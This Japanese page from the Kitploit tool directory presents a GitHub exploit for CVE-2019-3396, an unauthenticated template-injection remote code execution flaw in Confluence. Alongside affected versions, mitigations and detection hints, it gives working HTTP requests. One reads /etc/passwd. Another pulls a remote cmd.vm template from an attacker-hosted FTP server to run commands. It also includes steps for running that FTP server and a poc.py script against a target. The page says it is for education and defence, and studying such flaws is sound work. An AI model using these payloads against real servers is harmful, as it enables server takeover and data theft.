Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-3396 — CVE-2019-3396 confluence SSTI RCE | Kitploit
ツール/GitHubGitHub/kh4sh3i/cve-2019-3396
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubkh4sh3i/cve-2019-3396

CVE-2019-3396

CVE-2019-3396 confluence SSTI RCE

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-3396

CVE-2019-3396 confluence SSTI RCE

🔎 CVE-2019-3396 とは?

  • Atlassian の重大な Confluence バグです。
  • タイプ: テンプレートインジェクション + パストラバーサル
  • リスク: ログインなしのリモートコード実行 (RCE)
  • ステータス: 実環境で悪用済み

🛑 影響を受けるバージョン

  • 6.6.0 → 6.6.11 ❌ 脆弱
  • 6.6.12 ✅ 修正済み
  • 6.12.0 → 6.12.2 ❌ 脆弱
  • 6.12.3 ✅ 修正済み
  • 6.13.0 → 6.13.2 ❌ 脆弱
  • 6.13.3 ✅ 修正済み
  • 6.14.0 → 6.14.1 ❌ 脆弱
  • 6.14.2 ✅ 修正済み

👉 詳細は必ず Atlassian の公式アドバイザリを確認してください。


💥 影響

  • サーバーの完全乗っ取り
  • データ窃取、ランサムウェア、暗号通貨マイナー
  • 攻撃者は任意のコードを実行可能

🔐 緩和策

  • ✅ 修正済みの Confluence バージョンにアップグレード(最善の対策)
  • 🚫 すぐにパッチを適用できない場合は Widget Connector マクロを無効化
  • 🔒 アクセスを制限(修正が完了するまで内部のみ)

👀 検出(安全なヒント)

  • マクロ/preview エンドポイントへの不審なリクエストがないかログを監視
  • 不審なプロセスや外部への通信を確認
  • 脆弱性スキャナを使用してバージョンを確認

📂 ファイル読み取り

root@kitploit:~
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}

{"macro":{"params":{"_template":"file:///etc/passwd"}}}

コマンド実行

root@kitploit:~
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***

{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}

自動化

  • VPS に cmd.vm をアップロード
  • ftp または https を使用してこの cmd.vm ファイルへのリンクを作成
root@kitploit:~
pip install pyftpdlib
python -m pyftpdlib -p  8888
  • poc.py ファイル内の pyftp の値を新しい値に更新 = "ftp://10.100.10.100:8888/cmd.vm"
root@kitploit:~
python poc.py <url> <cmd>
python poc.py https://ip:port  "id"

⚠️ ヒント — このリポジトリは教育、防御、啓発のみを目的としています。


🔗 参考リンク

  • Atlassian アドバイザリ 🏢
  • CVE-2019-3396 の NVD エントリ 🛡️
ツールをダウンロード